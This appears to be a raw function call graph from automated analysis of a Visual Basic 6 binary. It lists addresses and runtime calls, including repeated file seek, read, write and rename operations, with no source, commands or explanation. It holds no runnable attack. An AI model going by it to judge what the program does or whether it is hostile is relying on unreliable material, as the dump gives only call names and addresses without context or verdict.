__vbaRecAnsiToUni 4982->4983 5034 4123c0 10 API calls 4982->5034 5246 4128b0 10 API calls 4982->5246 5262 411d10 __vbaChkstk __vbaStrCopy __vbaOnError __vbaStrCat __vbaStrMove 4982->5262 4983->4963 4987 40e107 4983->4987 4989 40d571 __vbaChkstk 4984->4989 4985->4989 4994 40e117 __vbaSetSystemError 4987->4994 4988->4980 4995 40d5b9 4989->4995 4990 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 4993 40ee70 24 API calls 4990->4993 4991->4977 4996 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 4993->4996 4994->4951 4997 40d5ea __vbaObjSet 4995->4997 4998 40d5ca __vbaHresultCheckObj 4995->4998 4996->4982 4999 40dbbb __vbaStrCopy 4996->4999 5006 40d646 4997->5006 4998->4997 5000 40ee70 24 API calls 4999->5000 5001 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5000->5001 5001->4982 5003 40dc2f __vbaStrCat __vbaStrMove 5001->5003 5004 40fba0 30 API calls 5003->5004 5007 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5004->5007 5008 40d651 __vbaHresultCheckObj 5006->5008 5009 40d66e 5006->5009 5010 415660 145 API calls 5007->5010 5012 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 5008->5012 5009->5012 5013 40dc9b __vbaFreeStr 5010->5013 5012->4928 5013->4982 5014 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5013->5014 5015 40fba0 30 API calls 5014->5015 5016 40dd14 5015->5016 5017 40dd24 __vbaNew2 5016->5017 5018 40dd63 __vbaObjSet __vbaObjSet 5016->5018 5017->5016 5043 412c10 __vbaStrCopy __vbaStrCopy __vbaOnError 5018->5043 5020 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5169 415d30 __vbaStrCopy __vbaStrCopy __vbaOnError __vbaStrToAnsi 5020->5169 5029 410027 __vbaStrCopy 5028->5029 5030 40ffed #537 __vbaStrMove __vbaInStr 5028->5030 5033 410053 __vbaFreeStr 5029->5033 5031 410073 __vbaErrorOverflow 5030->5031 5032 41000c #616 __vbaStrMove __vbaFreeStr 5030->5032 5032->5029 5033->4971 5035 412590 __vbaErrorOverflow 5034->5035 5036 41249c 5034->5036 5036->5035 5037 4124a5 5036->5037 5038 4124b5 7 API calls 5037->5038 5039 41252c __vbaI2I4 __vbaFileClose 5037->5039 5041 40ee70 24 API calls 5038->5041 5040 412567 __vbaFreeStr __vbaFreeStr 5039->5040 5040->4990 5042 412521 __vbaStrMove 5041->5042 5042->5039 5044 412ec1 5043->5044 5045 412e59 __vbaRecUniToAnsi __vbaStrToAnsi 5043->5045 5047 414b58 __vbaI2I4 __vbaFileClose __vbaExitProc 5044->5047 5048 412eca __vbaRecUniToAnsi __vbaStrToAnsi 5044->5048 5300 405d50 5045->5300 5049 414d3e __vbaAryDestruct __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5047->5049 5051 405d50 5048->5051 5049->5020 5053 412f06 __vbaSetSystemError __vbaRecAnsiToUni 5051->5053 5052 412f30 __vbaStrToUnicode __vbaFreeStr 5054 412f50 5052->5054 5053->5052 5055 412f56 __vbaHresultCheckObj 5054->5055 5056 412f68 __vbaI2I4 5054->5056 5055->5056 5057 412f7f 5056->5057 5058 412f85 __vbaHresultCheckObj 5057->5058 5059 412f97 5057->5059 5058->5059 5060 414d8a __vbaErrorOverflow 5059->5060 5061 412fd0 __vbaHresultCheckObj 5059->5061 5062 412fe2 5059->5062 5061->5062 5062->5060 5063 413018 __vbaHresultCheckObj 5062->5063 5064 41302a 5062->5064 5063->5064 5065 41303d __vbaHresultCheckObj 5064->5065 5066 41304f 5064->5066 5065->5066 5067 413073 5066->5067 5068 413064 __vbaHresultCheckObj 5066->5068 5069 413097 __vbaHresultCheckObj 5067->5069 5070 4130a9 5067->5070 5068->5067 5069->5070 5071 4130c7 __vbaSetSystemError 5070->5071 5071->5047 5072 4130e1 5071->5072 5073 4130f2 __vbaHresultCheckObj 5072->5073 5074 413104 5072->5074 5073->5074 5075 413110 __vbaSetSystemError 5074->5075 5075->5060 5076 413125 __vbaRedim 5075->5076 5076->5060 5077 41314c __vbaI2I4 5076->5077 5087 413164 5077->5087 5078 41341a 5078->5060 5079 413db2 __vbaStrCat __vbaStrMove #537 5078->5079 5081 413434 __vbaI2I4 5078->5081 5079->5060 5082 413e00 5079->5082 5080 41317f __vbaI2I4 5080->5087 5102 413440 5081->5102 5082->5060 5084 413e33 5082->5084 5085 413e3b _adj_fdiv_m64 5082->5085 5083 41350a 5083->5060 5086 413516 __vbaI2I4 5083->5086 5088 414d85 5084->5088 5089 413e6b __vbaLenBstr 5084->5089 5085->5084 5148 413528 5086->5148 5087->5060 5087->5078 5087->5080 5090 413200 __vbaHresultCheckObj 5087->5090 5120 413344 13 API calls 5087->5120 5121 4132a8 13 API calls 5087->5121 5302 414d90 5087->5302 5088->5060 5089->5088 5093 413ea0 7 API calls 5089->5093 5090->5087 5091 413c14 5091->5060 5096 413c2a __vbaI2I4 5091->5096 5092 4134bf __vbaGenerateBoundsError 5099 4134c8 __vbaStrCopy 5092->5099 5097 4144f0 5093->5097 5098 413ee8 117 API calls 5093->5098 5095 413548 __vbaI2I4 5095->5148 5128 413c38 5096->5128 5097->5047 5105 4144fa 113 API calls 5097->5105 5104 414acf 9 API calls 5098->5104 5099->5060 5099->5102 5101 414d90 5 API calls 5106 41324c __vbaI2I4 5101->5106 5102->5060 5102->5083 5102->5092 5102->5099 5103 413487 __vbaGenerateBoundsError 5102->5103 5107 41349f __vbaGenerateBoundsError 5102->5107 5103->5102 5104->5049 5105->5104 5108 414d90 5 API calls 5106->5108 5107->5102 5109 41326a __vbaI2I4 5108->5109 5109->5087 5110 4135c0 __vbaHresultCheckObj 5110->5148 5111 413cad __vbaGenerateBoundsError 5112 413cb6 __vbaStrCmp 5111->5112 5112->5128 5113 413977 __vbaGenerateBoundsError 5122 413982 __vbaStrCmp 5113->5122 5114 413687 __vbaGenerateBoundsError 5119 413692 __vbaStrCmp 5114->5119 5115 413c79 __vbaGenerateBoundsError 5115->5128 5116 413c91 __vbaGenerateBoundsError 5116->5128 5117 413d3e #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 5117->5060 5117->5128 5118 413d29 __vbaGenerateBoundsError 5118->5128 5119->5148 5120->5087 5121->5087 5122->5148 5123 413610 __vbaGenerateBoundsError 5123->5148 5124 413900 __vbaGenerateBoundsError 5124->5148 5125 413639 _adj_fdiv_m64 5125->5148 5126 413929 _adj_fdiv_m64 5126->5148 5127 413cf5 __vbaGenerateBoundsError 5127->5128 5128->5060 5128->5079 5128->5111 5128->5112 5128->5115 5128->5116 5128->5117 5128->5118 5128->5127 5135 413d0d __vbaGenerateBoundsError 5128->5135 5313 414e80 __vbaStrCopy __vbaAryConstruct2 __vbaStrCmp 5128->5313 5129 4137f9 __vbaGenerateBoundsError 5129->5148 5130 413ae9 __vbaGenerateBoundsError 5130->5148 5131 413748 __vbaGenerateBoundsError 5134 41374d __vbaStrCopy 5131->5134 5132 413a38 __vbaGenerateBoundsError 5136 413a3d __vbaStrCopy 5132->5136 5134->5148 5135->5128 5136->5148 5137 4138b8 __vbaGenerateBoundsError 5151 413bb0 __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStr 5137->5151 5138 413654 __vbaR8IntI4 5138->5148 5149 413667 __vbaGenerateBoundsError 5138->5149 5139 413b93 __vbaGenerateBoundsError 5139->5148 5140 413944 __vbaR8IntI4 5145 413957 __vbaGenerateBoundsError 5140->5145 5140->5148 5141 413786 __vbaGenerateBoundsError 5141->5148 5142 413a76 __vbaGenerateBoundsError 5142->5148 5143 4136d5 __vbaGenerateBoundsError 5143->5148 5144 4139c5 __vbaGenerateBoundsError 5144->5148 5145->5148 5146 4137ab _adj_fdiv_m64 5146->5148 5147 4139ea _adj_fdiv_m64 5147->5148 5148->5060 5148->5088 5148->5091 5148->5095 5148->5110 5148->5113 5148->5114 5148->5119 5148->5122 5148->5123 5148->5124 5148->5125 5148->5126 5148->5129 5148->5130 5148->5131 5148->5132 5148->5134 5148->5136 5148->5137 5148->5138 5148->5139 5148->5140 5148->5141 5148->5142 5148->5143 5148->5144 5148->5146 5148->5147 5150 413a9b _adj_fdiv_m64 5148->5150 5148->5151 5152 4136fa _adj_fdiv_m64 5148->5152 5153 413b1a __vbaGenerateBoundsError 5148->5153 5154 41382a __vbaGenerateBoundsError 5148->5154 5155 413ab6 __vbaR8IntI4 5148->5155 5156 413715 __vbaR8IntI4 5148->5156 5157 413b43 _adj_fdiv_m64 5148->5157 5158 4137c6 __vbaR8IntI4 5148->5158 5159 413a05 __vbaR8IntI4 5148->5159 5160 413853 _adj_fdiv_m64 5148->5160 5165 413b5e __vbaR8IntI4 5148->5165 5166 41386e __vbaR8IntI4 5148->5166 5149->5148 5150->5148 5151->5060 5151->5148 5152->5148 5153->5148 5154->5148 5155->5148 5161 413ac9 __vbaGenerateBoundsError 5155->5161 5156->5148 5162 413728 __vbaGenerateBoundsError 5156->5162 5157->5148 5158->5148 5163 4137d9 __vbaGenerateBoundsError 5158->5163 5159->5148 5164 413a18 __vbaGenerateBoundsError 5159->5164 5160->5148 5161->5148 5162->5148 5163->5148 5164->5148 5165->5148 5167 413b75 __vbaGenerateBoundsError 5165->5167 5166->5148 5168 413885 __vbaGenerateBoundsError 5166->5168 5167->5148 5168->5148 5365 4066f4 5169->5365 5247 412c00 __vbaErrorOverflow 5246->5247 5248 41298c 5246->5248 5248->5247 5249 412b90 __vbaI2I4 __vbaFileClose 5248->5249 5250 4129a9 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 5248->5250 5251 412bd7 __vbaFreeStr __vbaFreeStr 5249->5251 5250->5247 5252 4129f4 __vbaLenBstr 5250->5252 5251->4982 5252->5247 5253 412a07 5252->5253 5253->5249 5254 412a1b 7 API calls 5253->5254 5255 40ee70 24 API calls 5254->5255 5256 412a87 __vbaStrMove __vbaStrCopy __vbaStrMove #616 __vbaStrMove 5255->5256 5257 40ee70 24 API calls 5256->5257 5258 412add __vbaStrMove __vbaStrCmp __vbaFreeStrList 5257->5258 5258->5249 5259 412b21 5258->5259 5260 40ee70 24 API calls 5259->5260 5261 412b31 6 API calls 5260->5261 5261->5249 5263 40fba0 30 API calls 5262->5263 5264 411d9a __vbaFreeStr __vbaStrCat __vbaStrMove 5263->5264 5265 415660 145 API calls 5264->5265 5266 411dd0 __vbaFreeStr 5265->5266 5267 411df2 __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5266->5267 5268 411ded __vbaFreeStr __vbaFreeStr 5266->5268 5269 40fba0 30 API calls 5267->5269 5268->4982 5270 411e43 5269->5270 5272 411e53 __vbaNew2 5270->5272 5273 411e6f __vbaObjSet __vbaObjSet 5270->5273 5272->5273 5275 412c10 452 API calls 5273->5275 5276 411ed4 __vbaFreeObjList #598 5275->5276 5277 411f04 5276->5277 5278 411f16 __vbaStrCat __vbaStrMove 5276->5278 5280 411f10 __vbaSetSystemError 5277->5280 5279 415d30 404 API calls 5278->5279 5281 411f43 12 API calls 5279->5281 5280->5278 5282 411ff0 8 API calls 5281->5282 5283 4123ba __vbaErrorOverflow 5281->5283 5282->5283 5284 412073 5282->5284 5284->5283 5285 412090 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 5284->5285 5286 4122d3 __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose 5284->5286 5285->5283 5287 4120db 5285->5287 5288 40fba0 30 API calls 5286->5288 5287->5286 5289 4120ef __vbaI2I4 __vbaFileSeek #525 __vbaStrMove 5287->5289 5290 412311 __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5288->5290 5296 412142 5289->5296 5290->5268 5291 41224c __vbaI2I4 __vbaPut3 __vbaStrCopy 5292 40ee70 24 API calls 5291->5292 5293 412287 __vbaStrMove 5292->5293 5295 40eab0 29 API calls 5293->5295 5294 412170 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 5294->5283 5294->5296 5297 41229b __vbaStrMove __vbaI2I4 __vbaPut3 __vbaFreeStrList 5295->5297 5296->5283 5296->5291 5296->5294 5298 41223a #598 5296->5298 5299 4121e1 6 API calls 5296->5299 5297->5286 5298->5296 5299->5298 5301 405d59 5300->5301 5303 414dc2 _adj_fdiv_m64 5302->5303 5304 414dba 5302->5304 5303->5304 5305 414de2 __vbaR8IntI4 5304->5305 5306 414e40 5304->5306 5307 414df6 5305->5307 5308 414e6e __vbaErrorOverflow 5305->5308 5306->5308 5312 413228 __vbaI2I4 5306->5312 5307->5308 5309 414e13 5307->5309 5310 414e1b _adj_fdiv_m64 5307->5310 5309->5306 5311 414e32 __vbaR8IntI4 5309->5311 5310->5309 5311->5306 5311->5308 5312->5101 5314 4155f6 __vbaFreeStr __vbaFreeStr __vbaAryDestruct 5313->5314 5318 414ef4 5313->5318 5314->5117 5316 415650 __vbaErrorOverflow 5317 414f24 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5317->5318 5318->5316 5318->5317 5320 414f77 5318->5320 5321 414f5f __vbaI2I4 5318->5321 5319 41564b 5319->5316 5320->5316 5320->5319 5323 414fcf #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5320->5323 5325 415029 5320->5325 5321->5318 5322 4150de 5322->5316 5322->5319 5328 415190 5322->5328 5329 415136 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5322->5329 5323->5320 5324 415004 __vbaI2I4 5323->5324 5324->5320 5325->5316 5325->5319 5325->5322 5326 415084 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5325->5326 5326->5325 5327 4150b9 __vbaI2I4 5326->5327 5327->5325 5328->5316 5328->5319 5331 415245 5328->5331 5332 4151eb #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5328->5332 5329->5322 5330 41516b __vbaI2I4 5329->5330 5330->5322 5331->5316 5331->5319 5334 4152fa 5331->5334 5336 4152a0 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5331->5336 5332->5328 5333 415220 __vbaI2I4 5332->5333 5333->5328 5334->5316 5334->5319 5337 4153ac 5334->5337 5339 415352 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5334->5339 5335 415461 5335->5319 5340 415495 5335->5340 5341 41549d _adj_fdiv_m32 5335->5341 5336->5331 5338 4152d5 __vbaI2I4 5336->5338 5337->5316 5337->5319 5337->5335 5343 415407 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5337->5343 5338->5331 5339->5334 5342 415387 __vbaI2I4 5339->5342 5340->5319 5344 4154b2 __vbaFpI2 5340->5344 5341->5340 5342->5334 5343->5337 5345 41543c __vbaI2I4 5343->5345 5346 4154c5 5344->5346 5347 4154cd _adj_fdiv_m32 5344->5347 5345->5337 5346->5319 5348 4154e2 __vbaFpI2 5346->5348 5347->5346 5349 4154f5 5348->5349 5350 4154fd _adj_fdiv_m32 5348->5350 5349->5319 5351 415512 __vbaFpI2 5349->5351 5350->5349 5352 415526 5351->5352 5353 41552e _adj_fdiv_m32 5351->5353 5352->5319 5354 415543 __vbaFpI2 5352->5354 5353->5352 5355 415557 5354->5355 5356 41555f _adj_fdiv_m32 5354->5356 5355->5319 5357 415574 __vbaFpI2 5355->5357 5356->5355 5358 415590 _adj_fdiv_m32 5357->5358 5359 415588 5357->5359 5358->5359 5359->5319 5360 4155a5 __vbaFpI2 5359->5360 5361 4155c1 _adj_fdiv_m32 5360->5361 5362 4155b9 5360->5362 5361->5362 5362->5319 5363 4155d2 __vbaFpI2 5362->5363 5363->5316 5364 4155d9 5363->5364 5364->5314 5364->5316 5366 4066fd 5365->5366 5367 40f149 5368 40f158 __vbaFreeStr __vbaFreeVar 5367->5368 5369 40f14f __vbaFreeStr 5367->5369 5369->5368 5373 40a24c 5374 40abac __vbaErrorOverflow 5373->5374 5375 40a25d 5373->5375 5376 40abc0 __vbaChkstk 5374->5376 5377 40a272 __vbaStrCat __vbaStrMove 5375->5377 5378 40aa5b 5375->5378 5379 40ac15 __vbaOnError 5376->5379 5380 40f8f0 4 API calls 5377->5380 5381 40f1d0 120 API calls 5378->5381 5382 418c90 20 API calls 5379->5382 5383 40a2a0 __vbaFreeStr 5380->5383 5384 40aa6c 5381->5384 5385 40ac50 5382->5385 5386 40a329 __vbaStrCat __vbaStrMove 5383->5386 5387 40a2bb 7 API calls 5383->5387 5388 40aa7f __vbaObjSet 5384->5388 5438 40f1a0 __vbaStrCopy __vbaStrCopy 5384->5438 5389 418c90 20 API calls 5385->5389 5390 40f8f0 4 API calls 5386->5390 5387->5386 5396 40aaba 5388->5396 5397 40ac75 5389->5397 5393 40a357 __vbaFreeStr 5390->5393 5394 40a3e0 __vbaStrCat __vbaStrMove 5393->5394 5395 40a372 7 API calls 5393->5395 5398 40f8f0 4 API calls 5394->5398 5395->5394 5399 40aacb __vbaHresultCheckObj 5396->5399 5400 40aaee 5396->5400 5401 40a40e __vbaFreeStr 5398->5401 5402 40aaf8 __vbaFreeObj 5399->5402 5400->5402 5403 40a497 __vbaStrCat __vbaStrMove 5401->5403 5404 40a429 7 API calls 5401->5404 5406 40ab6f __vbaFreeStr __vbaFreeStr 5402->5406 5405 40f8f0 4 API calls 5403->5405 5404->5403 5407 40a4c5 __vbaFreeStr 5405->5407 5408 40a4e0 7 API calls 5407->5408 5409 40a54e __vbaStrCat __vbaStrMove 5407->5409 5408->5409 5410 40f8f0 4 API calls 5409->5410 5411 40a57c __vbaFreeStr 5410->5411 5412 40a605 __vbaStrCat __vbaStrMove 5411->5412 5413 40a597 7 API calls 5411->5413 5414 40f8f0 4 API calls 5412->5414 5413->5412 5415 40a633 __vbaFreeStr 5414->5415 5416 40a6bc __vbaStrCat __vbaStrMove 5415->5416 5417 40a64e 7 API calls 5415->5417 5418 40f8f0 4 API calls 5416->5418 5417->5416 5419 40a6ea __vbaFreeStr 5418->5419 5420 40a773 __vbaStrCat __vbaStrMove 5419->5420 5421 40a705 7 API calls 5419->5421 5422 40f8f0 4 API calls 5420->5422 5421->5420 5423 40a7a1 __vbaFreeStr 5422->5423 5424 40a82a __vbaStrCat __vbaStrMove 5423->5424 5425 40a7bc 7 API calls 5423->5425 5426 40f8f0 4 API calls 5424->5426 5425->5424 5427 40a858 __vbaFreeStr 5426->5427 5428 40a8e1 __vbaStrCat __vbaStrMove 5427->5428 5429 40a873 7 API calls 5427->5429 5430 40f8f0 4 API calls 5428->5430 5429->5428 5431 40a90f __vbaFreeStr 5430->5431 5432 40a998 __vbaStrCat __vbaStrMove 5431->5432 5433 40a92a 7 API calls 5431->5433 5434 40f8f0 4 API calls 5432->5434 5433->5432 5435 40a9c6 __vbaFreeStr 5434->5435 5436 40a9e1 7 API calls 5435->5436 5437 40aa4f 5435->5437 5436->5437 5438->5388 4126 407a50 __vbaChkstk 4127 407aa5 4126->4127 4128 407ad8 4127->4128 4129 407abc __vbaNew2 4127->4129 4130 407b17 __vbaHresultCheckObj 4128->4130 4131 407b3a 4128->4131 4129->4128 4130->4131 4132 407b77 __vbaHresultCheckObj 4131->4132 4133 407b9a 4131->4133 4134 407ba4 __vbaFreeObj 4132->4134 4133->4134 4135 407bd3 4134->4135 4136 407bc6 __vbaEnd 4134->4136 4137 407be3 __vbaNew2 4135->4137 4138 407bff 4135->4138 4136->4135 4137->4138 4139 407c61 4138->4139 4140 407c3e __vbaHresultCheckObj 4138->4140 4141 407c99 __vbaHresultCheckObj 4139->4141 4142 407cbc 4139->4142 4140->4139 4143 407cc6 __vbaFreeObj 4141->4143 4142->4143 4144 407ce7 4143->4144 4145 407cf8 __vbaHresultCheckObj 4144->4145 4146 407d1b 4144->4146 4145->4146 4147 407d51 4146->4147 4148 407d35 __vbaNew2 4146->4148 4149 407d90 __vbaHresultCheckObj 4147->4149 4150 407db3 4147->4150 4148->4147 4149->4150 4151 407e10 4150->4151 4152 407ded __vbaHresultCheckObj 4150->4152 4153 407e1a #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 4151->4153 4152->4153 4154 407e76 4153->4154 4155 407f98 4153->4155 4156 407ea2 4154->4156 4157 407e86 __vbaNew2 4154->4157 4158 407fc4 4155->4158 4159 407fa8 __vbaNew2 4155->4159 4162 407ee1 __vbaHresultCheckObj 4156->4162 4163 407f04 4156->4163 4157->4156 4160 408003 __vbaHresultCheckObj 4158->4160 4161 408026 4158->4161 4159->4158 4160->4161 4164 408060 __vbaHresultCheckObj 4161->4164 4165 408083 4161->4165 4162->4163 4166 407f61 4163->4166 4167 407f3e __vbaHresultCheckObj 4163->4167 4168 40808d __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeObj 4164->4168 4165->4168 4169 407f6b __vbaStrMove __vbaFreeObj 4166->4169 4167->4169 4170 4080b9 __vbaStrCopy 4168->4170 4169->4170 4242 40ee70 __vbaLenBstr 4170->4242 4172 4080d7 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4173 408112 __vbaNew2 4172->4173 4174 40812e 4172->4174 4173->4174 4175 408190 4174->4175 4176 40816d __vbaHresultCheckObj 4174->4176 4177 4081ca __vbaHresultCheckObj 4175->4177 4178 4081ed 4175->4178 4176->4175 4179 4081f7 12 API calls 4177->4179 4178->4179 4180 40ee70 24 API calls 4179->4180 4181 4082a5 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4180->4181 4182 40ee70 24 API calls 4181->4182 4183 4082ee __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4182->4183 4184 40ee70 24 API calls 4183->4184 4185 40833e 6 API calls 4184->4185 4186 40ee70 24 API calls 4185->4186 4187 4083a3 6 API calls 4186->4187 4188 40ee70 24 API calls 4187->4188 4189 408402 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4188->4189 4190 40ee70 24 API calls 4189->4190 4191 408452 6 API calls 4190->4191 4192 40ee70 24 API calls 4191->4192 4193 4084b8 6 API calls 4192->4193 4194 40ee70 24 API calls 4193->4194 4195 408517 14 API calls 4194->4195 4196 40ee70 24 API calls 4195->4196 4197 4085ef 14 API calls 4196->4197 4198 40ee70 24 API calls 4197->4198 4199 4086ce 6 API calls 4198->4199 4200 40ee70 24 API calls 4199->4200 4201 408734 8 API calls 4200->4201 4202 40ee70 24 API calls 4201->4202 4203 4087a9 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4202->4203 4255 4125a0 10 API calls 4203->4255 4205 4087e7 7 API calls 4206 4088bb __vbaStrCmp 4205->4206 4207 40885f 4205->4207 4209 408979 __vbaStrCmp 4206->4209 4210 4088dc 4206->4210 4270 418c90 6 API calls 4207->4270 4211 408a32 __vbaStrCopy 4209->4211 4212 40899a 4209->4212 4214 4125a0 60 API calls 4210->4214 4215 40ee70 24 API calls 4211->4215 4216 4125a0 60 API calls 4212->4216 4218 4088ef 4214->4218 4219 408a56 6 API calls 4215->4219 4220 4089ad 4216->4220 4222 408937 #600 __vbaEnd 4218->4222 4278 40fba0 __vbaChkstk __vbaOnError 4218->4278 4224 40ee70 24 API calls 4219->4224 4225 4089f5 #600 __vbaEnd 4220->4225 4228 40fba0 30 API calls 4220->4228 4222->4211 4227 408abc 8 API calls 4224->4227 4225->4211 4230 40ee70 24 API calls 4227->4230 4231 4089c6 4228->4231 4233 408b31 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4230->4233 4234 415660 145 API calls 4231->4234 4232 408921 #580 4232->4222 4235 40ee70 24 API calls 4233->4235 4236 4089df #580 4234->4236 4237 408b7a __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4235->4237 4236->4225 4238 40ee70 24 API calls 4237->4238 4239 408bc3 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4238->4239 4240 40ee70 24 API calls 4239->4240 4241 408c0c __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4240->4241 4254 40eece 4242->4254 4243 40f136 __vbaStrCopy 4244 40f142 __vbaFreeStr 4243->4244 4244->4172 4245 40eef6 #631 __vbaStrMove #516 4246 40f18b __vbaErrorOverflow 4245->4246 4245->4254 4248 40ef68 __vbaFreeStr __vbaFreeVar 4248->4246 4248->4254 4249 40ef98 #631 __vbaStrMove #516 4249->4246 4249->4254 4250 40f00f __vbaFreeStr __vbaFreeVar 4250->4246 4250->4254 4251 40f040 #631 __vbaStrMove #516 4251->4246 4251->4254 4252 40f0af __vbaFreeStr __vbaFreeVar 4252->4246 4252->4254 4253 40f0ee #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 4253->4246 4253->4254 4254->4243 4254->4244 4254->4245 4254->4246 4254->4248 4254->4249 4254->4250 4254->4251 4254->4252 4254->4253 4256 41267c 4255->4256 4257 41289e __vbaErrorOverflow 4255->4257 4256->4257 4258 412685 4256->4258 4259 412699 7 API calls 4258->4259 4266 412810 __vbaI2I4 __vbaFileClose 4258->4266 4261 40ee70 24 API calls 4259->4261 4263 412705 __vbaStrMove __vbaStrCopy __vbaStrMove #616 __vbaStrMove 4261->4263 4262 412875 __vbaFreeStr __vbaFreeStr 4262->4205 4264 40ee70 24 API calls 4263->4264 4265 41275b __vbaStrMove __vbaStrCmp __vbaFreeStrList 4264->4265 4265->4266 4267 41279f 4265->4267 4266->4262 4268 40ee70 24 API calls 4267->4268 4269 4127af 6 API calls 4268->4269 4269->4266 4332 405dd8 4270->4332 4334 40f8f0 __vbaStrToAnsi 4278->4334 4281 40fc43 4338 40f9a0 __vbaStrToAnsi 4281->4338 4282 40fc0b #580 #529 4283 408908 4282->4283 4287 415660 10 API calls 4283->4287 4286 40fc5e 18 API calls 4286->4283 4288 415742 4287->4288 4289 415d28 __vbaErrorOverflow 4287->4289 4288->4289 4290 41574b __vbaStrCopy 4288->4290 4291 40ee70 24 API calls 4290->4291 4292 41575e __vbaStrMove __vbaFreeStr 4291->4292 4293 4158e3 __vbaStrCat __vbaStrMove 4292->4293 4294 41577d __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaGet4 4292->4294 4295 4158fd 4293->4295 4296 40ee70 24 API calls 4294->4296 4297 40eab0 29 API calls 4295->4297 4298 4157b2 6 API calls 4296->4298 4299 415902 __vbaStrMove __vbaFreeStr 4297->4299 4300 4158c7 __vbaStrCat __vbaStrMove 4298->4300 4301 415816 4298->4301 4302 415912 8 API calls 4299->4302 4300->4295 4303 40ee70 24 API calls 4301->4303 4309 41597d 4302->4309 4304 41581f 6 API calls 4303->4304 4344 40eab0 #594 __vbaFreeVar __vbaLenBstr 4304->4344 4305 415a25 #594 __vbaFreeVar __vbaRedim 4315 415a67 4305->4315 4307 415860 __vbaStrMove __vbaFreeStrList 4307->4289 4310 41588b __vbaI2I4 __vbaGet4 4307->4310 4308 4159a0 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 4308->4289 4308->4309 4309->4289 4309->4305 4309->4308 4314 4159e8 6 API calls 4309->4314 4320 4158a5 4310->4320 4311 415b11 4316 415b1f __vbaSetSystemError 4311->4316 4321 415b25 4311->4321 4312 415a74 #593 4313 415abd __vbaGenerateBoundsError 4312->4313 4312->4315 4313->4315 4314->4309 4315->4311 4315->4312 4315->4313 4317 415aaf __vbaGenerateBoundsError 4315->4317 4318 415d23 4315->4318 4319 415adf __vbaFpUI1 __vbaFreeVar 4315->4319 4316->4321 4317->4315 4318->4289 4319->4289 4319->4315 4320->4289 4320->4302 4321->4289 4322 415b92 4321->4322 4323 415b6b __vbaI2I4 __vbaPutOwner3 4321->4323 4322->4289 4324 415b9e #593 4322->4324 4323->4289 4323->4321 4324->4318 4325 415bd5 __vbaFpI4 __vbaFreeVar 4324->4325 4326 415bfa __vbaRedimPreserve __vbaI2I4 __vbaPutOwner3 4325->4326 4327 415bef 4325->4327 4326->4289 4328 415c34 4326->4328 4329 415bf4 __vbaSetSystemError 4327->4329 4328->4289 4330 415c3d 9 API calls 4328->4330 4329->4326 4331 415ce0 6 API calls 4330->4331 4331->4232 4333 405de1 4332->4333 4342 405768 4334->4342 4336 40f937 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4337 40f958 4336->4337 4337->4281 4337->4282 4339 405768 4338->4339 4340 40f9e7 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4339->4340 4341 40fa08 4340->4341 4341->4283 4341->4286 4343 405771 4342->4343 4350 40eb43 4344->4350 4345 40ede6 __vbaStrCopy 4347 40ee44 __vbaFreeStr 4345->4347 4346 40eb4f #631 __vbaStrMove #516 __vbaFreeStr __vbaFreeVar 4348 40ee69 __vbaErrorOverflow 4346->4348 4346->4350 4347->4307 4349 40ec68 #593 4349->4348 4349->4350 4350->4345 4350->4346 4350->4348 4350->4349 4351 40ee64 4350->4351 4352 40ecf9 17 API calls 4350->4352 4351->4348 4352->4348 4352->4350 5441 404850 5442 40d750 __vbaChkstk 5441->5442 5443 40d7a5 __vbaOnError 5442->5443 5444 40f9a0 4 API calls 5443->5444 5445 40d7cb 5444->5445 5446 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 5445->5446 5447 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5445->5447 5448 40d841 __vbaStrCat __vbaStrMove 5446->5448 5449 40d82a __vbaStrCopy 5446->5449 5451 40d864 __vbaInStr __vbaInStr 5448->5451 5449->5451 5452 40e11d #598 5451->5452 5453 40d8ad 5451->5453 5452->5447 5454 40d8cf 6 API calls 5453->5454 5456 40d8c9 __vbaSetSystemError 5453->5456 5455 404c70 5454->5455 5457 40d93d 